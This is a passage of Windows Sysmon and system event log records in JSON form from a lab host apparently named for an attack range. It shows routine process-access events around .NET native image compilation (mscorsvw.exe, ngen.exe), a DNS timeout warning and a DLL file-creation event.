0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:59.340","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-051B-5F25-0000-0010BA4C1300}","TargetProcessId":"3792","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:01:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8224,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:59.340\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-051B-5F25-0000-0010BA4C1300}\r\nTargetProcessId: 3792\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:59.340","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-051B-5F25-0000-0010BA4C1300}","TargetProcessId":"3792","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8225,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:59.481\r\nSourceProcessGUID: {A837DB8D-040F-5F25-0000-0010414F0B00}\r\nSourceProcessId: 2732\r\nSourceThreadId: 3272\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0505-5F25-0000-00101FF81200}\r\nTargetProcessId: 1064\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:59.481","SourceProcessGUID":"{A837DB8D-040F-5F25-0000-0010414F0B00}","SourceProcessId":"2732","SourceThreadId":"3272","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0505-5F25-0000-00101FF81200}","TargetProcessId":"1064","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:01:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8226,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:59.481\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0505-5F25-0000-00101FF81200}\r\nTargetProcessId: 1064\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:59.481","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0505-5F25-0000-00101FF81200}","TargetProcessId":"1064","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:01:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8227,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:59.497\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-051B-5F25-0000-0010E2501300}\r\nTargetProcessId: 1064\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:59.497","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-051B-5F25-0000-0010E2501300}","TargetProcessId":"1064","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:59","Hostname":"win-dc-881393.attackrange.local","Keywords":4611686018695823360,"EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":1014,"SourceName":"Microsoft-Windows-DNS-Client","ProviderGuid":"{1C95126E-7EEA-49A9-A3FE-A378B03DDB4D}","Version":0,"Task":1014,"OpcodeValue":0,"RecordNumber":76869,"ProcessID":1332,"ThreadID":1792,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"Name resolution for the name 130.131.72.36.in-addr.arpa. timed out after none of the configured DNS servers responded.","Opcode":"Info","QueryName":"130.131.72.36.in-addr.arpa.","AddressLength":"128","Address":"1700000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000","EventReceivedTime":"2020-08-01 06:01:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:00","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8228,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:01:00.372\r\nProcessGuid: {A837DB8D-051B-5F25-0000-0010E2501300}\r\nProcessId: 1064\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\428-0\\Microsoft.VisualBasic.dll\r\nCreationUtcTime: 2020-08-01 06:01:00.372","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:01:00.372","ProcessGuid":"{A837DB8D-051B-5F25-0000-0010E2501300}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\428-0\\Microsoft.VisualBasic.dll","CreationUtcTime":"2020-08-01 06:01:00.372","EventReceivedTime":"2020-08-01 06:01:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:00","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8229,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:00.434\r\nSourceProcessGUID: {A837DB8D-040F-5F25-0000-0010414F0B00}\r\nSourceProcessId: 2732\r\nSourceThreadId: 2496\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-051C-5F25-0000-0010B5551300}\r\nTargetProcessId: 3396\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:00.434","SourceProcessGUID":"{A837DB8D-040F-5F25-0000-0010414F0B00}","SourceProcessId":"2732","SourceThreadId":"2496","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-051C-5F25-0000-0010B5551300}","TargetProcessId":"3396","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 06:01:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:00","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8230,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:00.434\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-051C-5F25-0000-0010B5551300}\r\nTargetProcessId: 3396\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:00.434","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-051C-5F25-0000-0010B5551300}","TargetProcessId":"3396","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:01:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:00","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8231,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:00.434\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-051C-5F25-0000-0010B5551300}\r\nTargetProcessId: 3396\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:00.434","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-051C-5F25-0000-0010B5551300}","TargetProcessId":"3396","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\